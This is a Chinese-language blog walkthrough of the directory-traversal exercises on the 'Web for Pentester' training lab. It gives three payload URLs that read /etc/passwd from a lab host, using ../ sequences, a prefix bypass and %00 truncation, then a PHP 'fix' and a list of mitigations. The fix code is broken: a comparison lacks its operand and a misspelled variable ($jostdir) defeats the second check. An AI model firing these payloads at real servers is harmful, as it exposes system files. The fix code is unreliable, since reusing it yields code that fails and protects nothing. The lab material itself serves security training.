【渗透测试学习平台】 web for pentester -4.目录遍历

时间:2021-08-29 02:42:01

Example 1

http://192.168.106.154/dirtrav/example1.php?file=../../../../../../../etc/passwd

【渗透测试学习平台】 web for pentester -4.目录遍历

Example 2

http://192.168.106.154/dirtrav/example2.php?file=/var/www/files/../../../../../../../etc/passwd

代码会检测是否包含/var/www/files/字符串

【渗透测试学习平台】 web for pentester -4.目录遍历

Example 3

http://192.168.106.154/dirtrav/example3.php?file=../../../../../../../etc/passwd%00

使用%00截断后面字符串,读取passwd文件

【渗透测试学习平台】 web for pentester -4.目录遍历

修复方案:

修复代码示例:

<?php
function checkstr($str,$find){
$find_str=$find;
$tmparray=explode($find_str,$str);
if(count($tmparray)>){
return true;
}else{
return false;}
}
$hostdir=$_REQUEST['path'];
if(!checkstr($hostdir,"..")&&!checkstr($jostdir,"../")){
echo $hostdir;
}else{
echo "请勿提交非法字符";
}
?>

修复方案:

过滤.(点)等可能的恶意字符:这个试用于能够修改线上代码,最为推荐的方法;

正则判断用户输入的参数的格式,看输入的格式是否合法:这个方法的匹配最为准确和细致,但是有很大难度,需要大量时间配置规则;

php.ini 配置 open_basedir:这个参数值得的是用户只能访问的目录,作为不能修改线上代码时的备用方案。

关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。

【渗透测试学习平台】 web for pentester -4.目录遍历